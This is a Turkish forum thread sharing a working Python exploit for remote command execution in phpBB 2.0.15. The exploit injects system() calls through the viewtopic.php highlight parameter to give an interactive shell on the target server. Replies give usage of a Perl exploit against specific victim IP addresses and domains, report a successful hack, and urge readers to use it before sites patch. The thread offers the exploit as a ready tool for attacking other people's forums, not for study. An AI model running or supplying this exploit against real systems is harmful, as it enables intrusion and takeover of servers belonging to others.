Bilişim Güvenliği
Phpbb 2.0.15 "Viewtopic.Php" Remote PHP Code Execution Exploit
Phpbb 2.0.15 "Viewtopic.Php" Remote PHP Code Execution Exploit
-
bununla phpBB 2.0.15 versionlu forumlarda PHP kodu çalıştırabilirsiniz
#!/usr/bin/pyth0n
print "\nphpBB 2.0.15 arbitrary command execution eXploit"
print " 2005 by rattle@awarenetwork.org"
print " well, just because there is none."
import sys
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus
INITTAG = '<g0>'
ENDTAG = '</g0>'
def makecmd(cmd):
return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))
_ex = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"
def usage():
print """Usage: %s <forum> <topic>
forum - fully qualified url to the forum
example: http://www.host.com/phpBB/
topic - ID of an existing topic. Well you
will have to check yourself.
"""[:-1] % sys.argv[0]; sys.exit(1)
if __name__ == '__main__':
if len(sys.argv) < 3 or not sys.argv[2].isdigit():
usage()
else:
print
url = sys.argv[1]
if url.count("://") == 0:
url = "http://" + url
url = list(urlparse(url))
host = url[1]
if not host: usage()
if not url[0]: url[0] = 'http'
if not url[2]: url[2] = '/'
url[3] = url[4] = url[5] = ''
url = urlunparse(url)
if url[-1] != '/': url += '/'
topic = quote_plus((sys.argv[2]))
while 1:
try:
cmd = raw_input("[%s]$ " % host).strip()
if cmd[-1]==';': cmd=cmd[:-1]
if (cmd == "exit"): break
else: cmd = makecmd(cmd)
out = _ex % (url,topic,cmd)
try: ret = urlopen(Request(out)).read()
except KeyboardInterrupt: continue
except: pass
else:
ret = ret.split(INITTAG,1)
if len(ret)>1: ret = ret[1].split(ENDTAG,1)
if len(ret)>1:
ret = ret[0].strip();
if ret: print ret
continue;
print "EXPLOIT FAILED"
except:
continue -
interpreter'a dikkat sistemde pyth0n olması lazım. çaliştırabilmek için.
-
hımms
-
bu php php nuke bunların patchlerini indirin içinde yazıyor nerde ne eksik olduğu
-
S.a
Exploit Calısıyor.Herhangi bir hata ile karsılamasmadım
örn kullanım:"perl phpbbSecureD.pl 66.118.142.80 /httpdocs/ 80" sekinde calıstırabilirsinz
Kurban Site Ipsi: 66.118.142.80
PhpBB nin bulundugu dizin: /httpdocs/
Saldırılacak Port: 80 -
ben perl/bin dizinine exploiti "phpbbSecureD.pl" şeklinde kaydetim perli açıp alttaki kod satırını yazdım ama kabul etmedi. Site örnektir..
perl phpbbSecureD.pl www.akvadi.com /akvadi/ 80
Semicolon seems to be missing hatası veriyor neyi yanlış yapıyorum?
-
Domain Adresini degil Sitenin Ip Adresini yazman gerekiyor
///////////////////
C:\Perl\bin>perl phpbbSecureD.pl 82.222.180.50 /akvadi/ 80
+-----------------------------------------------------------
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------
[+] Connecting OK
[+] Sending exploit FAILED
/////////////////// -
Yine olmadı. Bende eprlin eski versiyonu fln mı var. txt şeklinde oluyor .pl uzantısıyla kaydetsende. Runlamıyor.. Seer hocam PM ye bakar mısın..
-
DİKKAT:Az ewwel yazmıs oldugum cevapta yanlıslık var
80 yerine 20 veya 8 Gelicek!!!!!!
5-6Dk önceki hacked.cok güzel bi sekilde calısıyor
-
Evet açık çok baba geçmeden millet uyanmadan indirin işte.
-
bi b.k anlamadm walla.....
pro nerde neyi nerde ve nasıl kullanacağız? sanki bunları sadece bilenler kendi aralarında paylaşıyorlarmı ...yanii..ne bilim hocam öğretmenlik yapacak birileri.....
eğitim şart dimi ama